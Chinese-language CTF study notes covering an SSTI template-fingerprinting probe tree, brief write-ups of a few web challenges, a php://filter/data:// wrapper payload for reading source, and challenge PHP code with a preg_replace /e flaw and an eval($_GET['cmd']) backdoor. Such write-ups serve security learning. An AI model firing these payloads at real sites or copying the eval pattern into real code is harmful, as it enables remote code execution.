Ting

SSTI模版判断

• ${7*7}
  • a{* comment *}b
    • Smarty
    • ${“z”.join(“ab”)}
      • Mako
      • Unknown
  • {{7*7}}
    • {{7*‘7’}}
      • Jinja2
      • Twig
      • Unknown
    • Not vulnerable

文件上传漏洞

参考博客

[GKCTF 2020]CheckIN

思路

• 进入后发现显示源码，可以进行REQUEST，可以GET传参Ginkgo来执行命令，但是需要base64加密。

[极客大挑战 2020]welcome

思路

• 进入页面用edge浏览器显示405，火狐进入是空白页。尝试get或post参数，发现post能够看到源码

但是还没完全弄懂，所以就是没有写很详细的原理 QAQ

之后学了会持续更新

PHP7&disable_functions漏洞利用

写这个是因为当时做题遇到了[GKCTF 2020]CheckIN这个题感觉这个里面用的漏洞和exp都不熟

[BJDCTF 2020]ZJCTF，不过如此

思路

• 进入后是一个GET传参，利用php伪协议得到next.php内容
• next.php是一个php的preg_replace /e 模式漏洞利用，执行RCE
• 其中有一些部分需要绕过，最终执行命令得到flag

EXP

• ?text=data://text/pain,I have a dream&file=php://filter/convert.base64-encode/resource=next.php
• 得到next.php内容

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}


foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
    @eval($_GET['cmd']);
}

其中的preg_replace /e 存在漏洞。